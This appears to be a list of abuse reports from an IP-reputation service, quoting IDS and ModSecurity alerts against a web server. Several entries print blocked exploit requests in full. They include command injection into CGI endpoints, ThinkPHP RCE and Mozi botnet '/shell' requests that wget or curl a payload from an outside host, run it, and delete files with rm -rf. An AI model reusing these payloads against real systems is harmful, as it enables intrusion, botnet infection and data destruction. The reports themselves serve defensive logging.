🇸🇨
2.56.10.39
09 Feb 2022
Sending garbage to mail users
Email Spam
Spoofing
🇳🇱
194.99.46.91
27 Jan 2022
Sending out phishing emails to users
Email Spam
🇨🇳
218.92.0.191
24 Jan 2022
ET SCAN Potential SSH Scan - Count 81 - Severity 2
Port Scan
Hacking
Brute-Force
Exploited Host
SSH
🇨🇳
218.92.0.192
19 Jan 2022
218.92.0.192
ET SCAN Potential SSH Scan
Severity: 2
Count: 73
Hacking
SSH
🇨🇳
114.215.174.68
25 Dec 2021
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' against variable `TX:ANOMALY_SCORE' (Value: `28' ) client: 114.215.174.68, server: , request: "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1"
Hacking
Exploited Host
Web App Attack
🇬🇧
109.237.103.123
25 Dec 2021
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' against variable `TX:ANOMALY_SCORE' (Value: `8' ) client: 109.237.103.123, server: , request: "GET /.env HTTP/1.1"
Hacking
Exploited Host
Web App Attack
🇨🇳
210.13.110.60
25 Dec 2021
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' against variable `TX:ANOMALY_SCORE' (Value: `18' ) client: 210.13.110.60, server: , request: "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0"
Hacking
Exploited Host
Web App Attack
🇨🇳
113.220.25.131
25 Dec 2021
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' against variable `TX:ANOMALY_SCORE' (Value: `18' ) client: 113.220.25.131, server: , request: "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1"
Hacking
Exploited Host
Web App Attack
🇳🇱
2.57.122.64
25 Dec 2021
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' against variable `TX:ANOMALY_SCORE' (Value: `8' ) client: 2.57.122.64, server: , request: "GET /.git/config HTTP/1.1"
Hacking
Exploited Host
Web App Attack
🇭🇰
103.40.172.189
25 Dec 2021
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' against variable `TX:ANOMALY_SCORE' (Value: `18' ) client: 103.40.172.189, server: , request: "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0"
Hacking
Exploited Host
Web App Attack
🇩🇪
212.192.216.42
25 Dec 2021
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' against variable `TX:ANOMALY_SCORE' (Value: `20' ) client: 212.192.216.42, server: , request: "GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1"
Hacking
Web App Attack
🇷🇺
195.54.160.149
15 Dec 2021
ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228) - 12/15/2021-10:55:28
ET WEB_SERVER ThinkPHP RCE Exploitation Attempt - 12/15/2021-05:56:29
ET WEB_SERVER Possible XXE SYSTEM ENTITY in POST BODY. - 12/15/2021-08:29:24
ET WEB_SERVER /bin/sh In URI Possible Shell Command Execution Attempt - 12/15/2021-09:51:46
SERVER-OTHER Apache Log4j logging remote code execution attempt - 12/15/2021-11:27:25
Hacking
Web App Attack
🇨🇳
47.115.46.167
03 Dec 2021
CronRAT C&C server
Hacking
Web App Attack
🇬🇧
188.223.72.106
14 Sep 2021
ET DOS DNS Amplification Attack Inbound -- 2021-09-14 19:15:50
Hacking
185.183.159.52
06 Jun 2021
EXPLOIT-KIT IFRAMEr injection detection - leads to exploit kit
Hacking
Web App Attack
45.77.104.33
06 Jun 2021
MALWARE-OTHER Unix.Miner.Xbash variant dropped bash script
Hacking
Web App Attack
45.10.24.165
06 Jun 2021
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' against variable `TX:ANOMALY_SCORE' (Value: `33' )
GET /public/index.php?s=/Index/%09hink%07pp/invokefunction&function=call_user_func_array&vars%5B0%5D=shell_exec&vars%5B1%5D%5B%5D=curl%20cd%20/tmp%20%7C%7C%20cd%20/var/run%20%7C%7C%20cd%20/mnt%20%7C%7C%20cd%20/root%20%7C%7C%20cd%20/;%20wget%20http://194.156.91.112/bins.sh;%20chmod%20777%20bins.sh;%20sh%20bins.sh;%20tftp%20194.156.91.112%20-c%20get%20tftp1.sh;%20chmod%20777%20tftp1.sh;%20sh%20tftp1.sh;%20tftp%20-r%20tftp2.sh%20-g%20194.156.91.112;%20chmod%20777%20tftp2.sh;%20sh%20tftp2.sh;%20ftpget%20-v%20-u%20anonymous%20-p%20anonymous%20-P%2021%20194.156.91.112%20ftp1.sh%20ftp1.sh;%20sh%20ftp1.sh;%20rm%20-rf%20bins.sh%20tftp1.sh%20tftp2.sh%20ftp1.sh;%20rm%20-rf%20* HTTP/1.1
Hacking
Web App Attack
45.148.10.50
31 May 2021
Continuous attempts to traverse web directory:
(http_inspect) WEBROOT DIRECTORY TRAVERSAL
Hacking
Web App Attack
45.10.24.165
14 May 2021
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' against variable `TX:ANOMALY_SCORE' (Value: `33' )
request: "GET /public/index.php?s=/Index/%09hink%07pp/invokefunction&function=call_user_func_array&vars%5B0%5D=shell_exec&vars%5B1%5D%5B%5D=curl%20cd%20/tmp%20%7C%7C%20cd%20/var/run%20%7C%7C%20cd%20/mnt%20%7C%7C%20cd%20/root%20%7C%7C%20cd%20/;%20wget%20http://194.156.91.112/bins.sh;%20chmod%20777%20bins.sh;%20sh%20bins.sh;%20tftp%20194.156.91.112%20-c%20get%20tftp1.sh;%20chmod%20777%20tftp1.sh;%20sh%20tftp1.sh;%20tftp%20-r%20tftp2.sh%20-g%20194.156.91.112;%20chmod%20777%20tftp2.sh;%20sh%20tftp2.sh;%20ftpget%20-v%20-u%20anonymous%20-p%20anonymous%20-P%2021%20194.156.91.112%20ftp1.sh%20ftp1.sh;%20sh%20ftp1.sh;%20rm%20-rf%20bins.sh%20tftp1.sh%20tftp2.sh%20ftp1.sh;%20rm%20-rf%20* HTTP/1.1"
Hacking
Exploited Host
Web App Attack
125.44.210.191
14 May 2021
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' against variable `TX:ANOMALY_SCORE' (Value: `18' )
request: "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://125.44.210.191:59579/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0"
Hacking
Exploited Host
Web App Attack
147.135.165.22
27 Apr 2021
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' against variable `TX:ANOMALY_SCORE' (Value: `18' )
request: "GET /cgi-bin/rtpd.cgi?wget&http:/203.159.80.188/bin.sh;chmod&777&bin.sh;./bin.sh;rm&-rf&bin.sh;wget&https://iplogger.org/28iw96 HTTP/1.1"
Hacking
Web App Attack
120.85.197.184
21 Apr 2021
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' against variable `TX:ANOMALY_SCORE' (Value: `18' )
request: "GET /shell?cd+/tmp;rm+-rf+*;wget+http://120.85.197.184:38143/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1"
Hacking
Web App Attack
81.104.248.239
21 Apr 2021
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' against variable `TX:ANOMALY_SCORE' (Value: `8' )
request: "GET /.env HTTP/1.1"
Hacking
Web App Attack
64.77.244.130
21 Apr 2021
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' against variable `TX:ANOMALY_SCORE' (Value: `8' )
request: "GET /.env HTTP/1.1"
Hacking
Web App Attack
178.175.122.23
21 Apr 2021
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' against variable `TX:ANOMALY_SCORE' (Value: `18' )
request: "GET /shell?cd+/tmp;rm+-rf+*;wget+http://178.175.122.231:32770/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1"
Hacking
Web App Attack